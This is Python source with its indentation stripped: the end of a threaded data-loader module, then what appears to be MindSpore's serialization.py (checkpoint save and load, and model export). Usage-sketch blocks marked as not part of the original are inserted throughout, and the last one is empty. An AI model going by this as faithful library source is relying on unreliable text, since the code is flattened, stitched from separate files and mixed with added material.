def stop(self):
self.is_running = False # signal the thread to exit
if self.gen_thread is not None:
self.gen_thread.join()
self.gen_thread = None
def __iter__(self):
self.is_running = True
self.gen_thread = Thread(target=self.enqueue_values, daemon=True)
self.gen_thread.start()
try:
while self.is_running and (self.gen_thread.is_alive() or not self.buffer.empty()):
try:
yield self.buffer.get(timeout=self.timeout)
except Empty:
pass # queue was empty this time, try again
finally:
self.stop() # ensure thread completion
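# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# A minimal example of driving ThreadBuffer directly; the plain `range(10)` iterable and the
# function name are placeholders chosen only for illustration.
def _thread_buffer_usage_sketch():
    """Hedged example: collects buffered values and always joins the worker thread."""
    buffer = ThreadBuffer(src=range(10), buffer_size=2, timeout=0.01)
    collected = []
    try:
        for item in buffer:  # items are produced by the background thread and yielded here
            collected.append(item)
    finally:
        buffer.stop()  # redundant with __iter__'s finally clause, but safe and explicit
    return collected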
class ThreadDataLoader(DataLoader):
"""
Subclass of `DataLoader` that uses a `ThreadBuffer` object to implement the `__iter__` method asynchronously. This
iterates over data from the loader as expected, but the data is generated on a separate thread. Use this class
where a `DataLoader` instance is required and not just an iterable object.
The default behaviour with `repeats` set to 1 is to yield each batch as it is generated; with a higher value the
generated batch is yielded that many times while the underlying dataset asynchronously generates the next one.
Typically not all relevant information is learned from a batch in a single iteration, so training multiple times
on the same batch will still produce good training with minimal short-term overfitting, while allowing a slow batch
generation process more time to produce a result.
See:
* Fischetti et al. "Faster SGD training by minibatch persistency." ArXiv (2018) https://arxiv.org/abs/1806.07353
* Dami et al., "Faster Neural Network Training with Data Echoing" ArXiv (2020) https://arxiv.org/abs/1907.05550
* Ramezani et al. "GCN meets GPU: Decoupling "When to Sample" from "How to Sample"." NeurIPS (2020).
https://proceedings.neurips.cc/paper/2020/file/d714d2c5a796d5814c565d78dd16188d-Paper.pdf
Args:
dataset: input dataset.
buffer_size: number of items to buffer from the data source.
buffer_timeout: time to wait for an item from the buffer, or to wait while the buffer is full when adding items.
num_workers: number of multi-processing workers used by the PyTorch DataLoader.
repeats: number of times to yield the same batch.
"""
def __init__(
self,
dataset: Dataset,
buffer_size: int = 1,
buffer_timeout: float = 0.01,
num_workers: int = 0,
repeats: int = 1,
**kwargs,
):
super().__init__(dataset, num_workers, **kwargs)
self.buffer_size = buffer_size
self.buffer_timeout = buffer_timeout
self.repeats = repeats
def __iter__(self):
buffer = ThreadBuffer(src=super().__iter__(), buffer_size=self.buffer_size, timeout=self.buffer_timeout)
for batch in buffer:
for _ in range(self.repeats):
yield batch
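# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# Shows ThreadDataLoader over a tiny in-memory dataset; the dict data, batch_size and repeats
# values are arbitrary placeholders, assuming the default PyTorch collate handles dicts of ints.
def _thread_data_loader_usage_sketch():
    """Hedged example: each underlying batch should be yielded twice because repeats=2."""
    ds = Dataset(data=[{"value": i} for i in range(8)], transform=None)
    loader = ThreadDataLoader(ds, buffer_size=1, buffer_timeout=0.01, num_workers=0,
                              repeats=2, batch_size=2)
    return [batch for batch in loader]  # 4 distinct batches, 8 yielded items in total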
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import sys
import stat
import math
import shutil
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
import mindspore.context as context
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap, ParallelLayouts
from mindspore.train.mind_ir_pb2 import ModelProto as mindir_model
from mindspore.train.mind_ir_pb2 import GraphProto as graph_proto
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data, Validator
from mindspore.compression.export import quant_export
from mindspore.parallel._tensor import _load_tensor
from mindspore.parallel._utils import _infer_rank_list, _remove_repeated_slices
from .._c_expression import load_mindir
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
TOTAL_SAVE = 1024 * 1024
def _special_process_par(par, new_par):
"""
Processes the special case where the new parameter only has extra trailing dimensions of size 1.
For example (12,2048,1,1)->(12,2048); this case is caused by GE using 4-dimensional tensors.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
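# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# Demonstrates the trailing-ones case described in the docstring above; the shapes and the
# parameter name "w" are placeholders.
def _special_process_par_usage_sketch():
    """Hedged example: a (12, 2048, 1, 1) value is squeezed into a (12, 2048) parameter."""
    par = Parameter(Tensor(np.zeros((12, 2048), np.float32)), name="w")
    new_par = Parameter(Tensor(np.ones((12, 2048, 1, 1), np.float32)), name="w")
    return _special_process_par(par, new_par)  # expected to return True and update `par`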
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsistent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute the process of saving checkpoint into file."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tobytes()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (Union[Cell, list]): The cell object or data list (each element is a dictionary, like
[{"name": param_name, "data": param_data},...], the type of
param_name would be string, and the type of param_data would
be parameter or `Tensor`).
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to perform integrated save in the automatic model parallel scenario. Default: True
async_save (bool): Whether to save the checkpoint to file asynchronously. Default: False
Raises:
TypeError: If the parameter save_obj is not an `nn.Cell` or a list, or if the parameters
`integrated_save` and `async_save` are not of bool type.
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
integrated_save = Validator.check_bool(integrated_save)
async_save = Validator.check_bool(async_save)
logger.info("Execute the process of saving checkpoint files.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
param_data = Tensor(value.data)
# in the automatic model parallel scenario, some parameters are split across all the devices,
# which should be combined before saving
if key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data, integrated_save)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Saving checkpoint process is finished.")
def _check_param_prefix(filter_prefix, param_name):
"""Checks whether the prefix of parameter name matches the given filter_prefix."""
for prefix in filter_prefix:
if param_name.find(prefix) == 0 \
and (param_name == prefix or param_name[len(prefix)] == "." or (prefix and prefix[-1] == ".")):
return True
return False
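# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# Shows how the prefix filter distinguishes a real sub-parameter from a similarly named one;
# the parameter names are made up for illustration.
def _check_param_prefix_usage_sketch():
    """Hedged example: 'conv1.weight' matches prefix 'conv1' but 'conv10.weight' does not."""
    matches = _check_param_prefix(("conv1",), "conv1.weight")      # True: prefix followed by '.'
    no_match = _check_param_prefix(("conv1",), "conv10.weight")    # False: different layer name
    return matches, no_match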
def load(file_name):
"""
Load MindIR.
The returned object can be executed by a `GraphCell`. However, there are some limitations to the current use
of `GraphCell`, see class :class:`mindspore.nn.GraphCell` for more details.
Args:
file_name (str): MindIR file name.
Returns:
Object, a compiled graph that can be executed by `GraphCell`.
Raises:
ValueError: MindIR file is incorrect.
Examples:
>>> import numpy as np
>>> import mindspore.nn as nn
>>> from mindspore import Tensor
>>> from mindspore.train import export, load
>>>
>>> net = nn.Conv2d(1, 1, kernel_size=3)
>>> input = Tensor(np.ones([1, 1, 3, 3]).astype(np.float32))
>>> export(net, input, file_name="net", file_format="MINDIR")
>>> graph = load("net.mindir")
>>> net = nn.GraphCell(graph)
>>> output = net(input)
"""
if not isinstance(file_name, str):
raise ValueError("The file name must be string.")
if not os.path.exists(file_name):
raise ValueError("The file is not exist.")
if not file_name.endswith(".mindir"):
raise ValueError("The MindIR should end with mindir, please input the correct file name.")
logger.info("Execute the process of loading mindir.")
graph = load_mindir(file_name)
if graph is None:
raise RuntimeError("Load MindIR failed.")
return graph
def load_checkpoint(ckpt_file_name, net=None, strict_load=False, filter_prefix=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
strict_load (bool): Whether to strictly load the parameters into the net. If False, parameters
in param_dict whose names have the same suffix will also be loaded into the net. Default: False
filter_prefix (Union[str, list[str], tuple[str]]): Parameters starting with the filter_prefix
will not be loaded. Default: None.
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
Examples:
>>> from mindspore import load_checkpoint
>>>
>>> ckpt_file_name = "./checkpoint/LeNet5-1_32.ckpt"
>>> param_dict = load_checkpoint(ckpt_file_name, filter_prefix="conv1")
"""
ckpt_file_name, filter_prefix = _check_checkpoint_param(ckpt_file_name, filter_prefix)
logger.info("Execute the process of loading checkpoint files.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
param_data_list = []
for element_id, element in enumerate(checkpoint_list.value):
if filter_prefix is not None and _check_param_prefix(filter_prefix, element.tag):
continue
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
logger.info("Loading checkpoint files process is finished.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if not parameter_dict:
raise ValueError(f"The loaded parameter dict is empty after filtering, please check filter_prefix.")
if net is not None:
load_param_into_net(net, parameter_dict, strict_load)
return parameter_dict
def _check_checkpoint_param(ckpt_file_name, filter_prefix=None):
"""Check function load_checkpoint's parameter."""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if filter_prefix is not None:
if not isinstance(filter_prefix, (str, list, tuple)):
raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str] "
f"when filter_prefix is not None, but got {str(type(filter_prefix))}.")
if isinstance(filter_prefix, str):
filter_prefix = (filter_prefix,)
if not filter_prefix:
raise ValueError("The filter_prefix can't be empty when filter_prefix is list or tuple.")
for index, prefix in enumerate(filter_prefix):
if not isinstance(prefix, str):
raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str], "
f"but got {str(type(prefix))} at index {index}.")
return ckpt_file_name, filter_prefix
def load_param_into_net(net, parameter_dict, strict_load=False):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
strict_load (bool): Whether to strictly load the parameters into the net. If False, parameters
in param_dict whose names have the same suffix will also be loaded into the net. Default: False
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
Examples:
>>> from mindspore import load_checkpoint, load_param_into_net
>>>
>>> net = Net()
>>> ckpt_file_name = "./checkpoint/LeNet5-1_32.ckpt"
>>> param_dict = load_checkpoint(ckpt_file_name, filter_prefix="conv1")
>>> param_not_load = load_param_into_net(net, param_dict)
>>> print(param_not_load)
['conv1.weight']
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
strict_load = Validator.check_bool(strict_load)
logger.info("Execute the process of loading parameters into net.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load and not strict_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Loading parameters into net is finished.")
if param_not_load:
logger.warning("{} parameters in the net are not loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): The network from which the graph to be saved is obtained.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute the process of saving graph.")
graph_pb = network.get_func_graph_proto()
if graph_pb:
with open(file_name, "wb") as f:
os.chmod(file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(graph_pb)
def _get_merged_param_data(net, param_name, param_data, integrated_save):
"""
Gets the merged data (tensor) from tensor slices, according to the device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name (str): The parameter name, which to be combined.
param_data (Tensor): The parameter data on the local device, which was a slice of the whole parameter data.
integrated_save (bool): Whether to integrated save in automatic model parallel scene.
Returns:
Tensor, the combined tensor which contains the whole data value.
"""
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
layout = net.parameter_layout_dict[param_name]
if len(layout) < 6:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
opt_shard_group = layout[5]
allgather_net = None
if param_name in net.parallel_parameter_merge_net_dict:
allgather_net = net.parallel_parameter_merge_net_dict[param_name]
else:
logger.info("need to create allgather net for %s", param_name)
if integrated_save:
if uniform_split == 0:
raise RuntimeError("Integrated save checkpoint only support uniform split tensor now.")
# if any dim is not equal to -1, the param is split and needs to be merged
# pipeline parallel needs to be supported here later
for dim in tensor_map:
if dim != -1:
if allgather_net is None:
if opt_shard_group:
allgather_net = get_allgather_cell(opt_shard_group, True)
else:
allgather_net = get_allgather_cell(opt_shard_group, False)
net.parallel_parameter_merge_net_dict[param_name] = allgather_net
param_data = allgather_net(param_data)
if field_size:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
if opt_shard_group:
if allgather_net is None:
allgather_net = get_allgather_cell(opt_shard_group, False)
net.parallel_parameter_merge_net_dict[param_name] = allgather_net
param_data = allgather_net(param_data)
elif opt_shard_group:
if allgather_net is None:
allgather_net = get_allgather_cell(opt_shard_group, False)
net.parallel_parameter_merge_net_dict[param_name] = allgather_net
param_data = allgather_net(param_data)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR', **kwargs):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' formats for the exported model.
- AIR: Ascend Intermediate Representation. An intermediate representation format of Ascend model.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
- MINDIR: MindSpore Native Intermediate Representation for Anf. An intermediate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
kwargs (dict): Configuration options dictionary.
- quant_mode: The mode of quant.
- mean: Input data mean. Default: 127.5.
- std_dev: Input data variance. Default: 127.5.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if not isinstance(file_name, str):
raise ValueError("Args file_name {} must be string, please check it".format(file_name))
Validator.check_file_name_by_regular(file_name)
net = _quant_export(net, *inputs, file_format=file_format, **kwargs)
_export(net, file_name, file_format, *inputs)
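# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# Mirrors the pattern in the `load` docstring above to export a small Conv2d cell to MindIR;
# the network, input shape and output file name are placeholders.
def _export_usage_sketch():
    """Hedged example: writes 'example_net.mindir' for a toy 3x3 convolution."""
    net = nn.Conv2d(1, 1, kernel_size=3)
    dummy_input = Tensor(np.ones([1, 1, 3, 3]).astype(np.float32))
    export(net, dummy_input, file_name="example_net", file_format="MINDIR")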
def _export(net, file_name, file_format, *inputs):
"""
It is an internal conversion function. Export the MindSpore prediction model to a file in the specified format.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping an ONNX file, switch the network to inference mode if it is training (NOTE: ONNX is only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
if not file_name.endswith('.air'):
file_name += ".air"
_executor.export(file_name, graph_id)
elif file_format == 'ONNX':
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(net, graph_id)
if not file_name.endswith('.onnx'):
file_name += ".onnx"
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR':
_save_mindir(net, file_name, *inputs)
if is_dump_onnx_in_training:
net.set_train(mode=True)
def _save_mindir(net, file_name, *inputs):
"""Save MindIR format file."""
model = mindir_model()
if net._auto_parallel_mode:
phase_name = "predict"
else:
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name,
do_convert=False, auto_parallel_mode=net._auto_parallel_mode)
mindir_stream = _executor._get_func_graph_proto(net, graph_id, 'mind_ir')
net_dict = net.parameters_dict()
data_total = 0
save_together = True
model.ParseFromString(mindir_stream)
for param_proto in model.graph.parameter:
name = param_proto.name[param_proto.name.find(":") + 1:]
if name in net_dict.keys():
data_total += sys.getsizeof(net_dict[name].data.asnumpy().tobytes()) / 1024
else:
raise RuntimeError('Graph parameter: {} is not defined in the network.'.format(param_proto.name))
if data_total > TOTAL_SAVE:
save_together = False
break
if save_together:
for param_proto in model.graph.parameter:
param_name = param_proto.name[param_proto.name.find(":")+1:]
if param_name in net_dict.keys():
param_data = net_dict[param_name].data.asnumpy().tobytes()
param_proto.raw_data = param_data
else:
logger.error("The parameter %s in the graph are not in the network.", param_name)
raise ValueError("The parameter in the graph must in the network.")
if not file_name.endswith('.mindir'):
file_name += ".mindir"
current_path = os.path.abspath(file_name)
dirname = os.path.dirname(current_path)
os.makedirs(dirname, exist_ok=True)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(model.SerializeToString())
else:
logger.warning("Parameters in the net capacity exceeds 1G, save MindIR model and parameters separately.")
# save parameter
file_prefix = file_name.split("/")[-1]
if file_prefix.endswith(".mindir"):
file_prefix = file_prefix[:-7]
current_path = os.path.abspath(file_name)
dirname = os.path.dirname(current_path)
data_path = dirname + "/" + file_prefix + "_variables"
if os.path.exists(data_path):
shutil.rmtree(data_path)
os.makedirs(data_path, exist_ok=True)
os.chmod(data_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
index = 0
graphproto = graph_proto()
data_size = 0
for name, param in net_dict.items():
for param_proto in model.graph.parameter:
if name == param_proto.name[param_proto.name.find(":") + 1:]:
parameter = graphproto.parameter.add()
parameter.name = param_proto.name
parameter.data_type = param_proto.data_type
for dim in param_proto.dims:
parameter.dims.append(dim)
byte_data = param.data.asnumpy().tobytes()
parameter.raw_data = byte_data
data_size += sys.getsizeof(byte_data) / 1024
break
if data_size > TOTAL_SAVE:
data_file_name = data_path + "/" + "data_" + str(index)
with open(data_file_name, "ab") as f:
os.chmod(data_file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(graphproto.SerializeToString())
index += 1
data_size = 0
del graphproto.parameter[:]
if graphproto.parameter:
data_file_name = data_path + "/" + "data_" + str(index)
with open(data_file_name, "ab") as f:
os.chmod(data_file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(graphproto.SerializeToString())
# save graph
del model.graph.parameter[:]
graph_file_name = dirname + "/" + file_prefix + "_graph.mindir"
with open(graph_file_name, 'wb') as f:
os.chmod(graph_file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(model.SerializeToString())
def _quant_export(network, *inputs, file_format, **kwargs):
"""
Exports a MindSpore quantization prediction model for deployment with AIR and MINDIR.
"""
if not kwargs.get('quant_mode', None):
return network
supported_device = ["Ascend", "GPU"]
supported_formats = ['AIR', 'MINDIR']
quant_mode_formats = ['AUTO', 'MANUAL']
mean = 127.5 if kwargs.get('mean', None) is None else kwargs['mean']
std_dev = 127.5 if kwargs.get('std_dev', None) is None else kwargs['std_dev']
quant_mode = kwargs['quant_mode']
if quant_mode not in quant_mode_formats:
raise KeyError("The quant_mode input is wrong, please choose one of {}.".format(quant_mode_formats))
mean = Validator.check_value_type("mean", mean, (int, float))
std_dev = Validator.check_value_type("std_dev", std_dev, (int, float))
if context.get_context('device_target') not in supported_device:
raise KeyError("Unsupported {} device target.".format(context.get_context('device_target')))
if file_format not in supported_formats:
raise ValueError('Illegal file format {}.'.format(file_format))
network.set_train(False)
if file_format == "MINDIR":
if quant_mode == 'MANUAL':
exporter = quant_export.ExportManualQuantNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
exporter = quant_export.ExportToQuantInferNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
if quant_mode == 'MANUAL':
exporter = quant_export.ExportManualQuantNetwork(network, mean, std_dev, *inputs)
else:
exporter = quant_export.ExportToQuantInferNetwork(network, mean, std_dev, *inputs)
deploy_net = exporter.run()
return deploy_net
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty, please make sure you enter the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scalar type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
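# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# The './print_output' path is a placeholder for a file produced by a Print operator in a
# previous run; this only shows how the returned list is typically consumed.
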